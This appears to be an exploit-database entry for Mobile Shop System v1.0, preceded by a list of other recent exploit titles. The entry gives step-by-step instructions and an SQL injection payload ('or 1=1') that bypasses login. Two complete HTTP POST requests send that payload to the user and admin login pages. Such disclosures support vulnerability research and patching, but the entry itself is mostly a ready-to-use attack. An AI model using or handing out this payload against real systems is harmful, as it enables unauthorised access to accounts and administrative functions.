
12 changes to exploits/shellcodes Comtrend AR-5387un router - Persistent XSS (Authenticated) Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure Visitor Management System in PHP 1.0 - SQL Injection (Authenticated) Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated) WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS RiteCMS 2.2.1 - Remote Code Execution (Authenticated) Mobile Shop System v1.0 - SQL Injection Authentication Bypass Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)
45 lines
No EOL
1.9 KiB
Text
45 lines
No EOL
1.9 KiB
Text
# Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass
|
|
# Exploit Author: Moaaz Taha (0xStorm)
|
|
# Date: 2020-09-08
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
|
|
|
|
# POC
|
|
1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php"
|
|
2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field.
|
|
3- Click on "login", then you will bypass the authentication successfully.
|
|
|
|
# Malicious HTTP POST Requests
|
|
|
|
POST /mobileshop-master/login.php HTTP/1.1
|
|
Host: 192.168.1.55:8888
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://192.168.1.55:8888/mobileshop-master/login.php
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 44
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
email=test%27+or+1%3D1+--+-&password=test123
|
|
|
|
==========================================================================
|
|
|
|
POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1
|
|
Host: 192.168.1.55:8888
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.php
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 44
|
|
Connection: close
|
|
Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
email=test%27+or+1%3D1+--+-&password=test123 |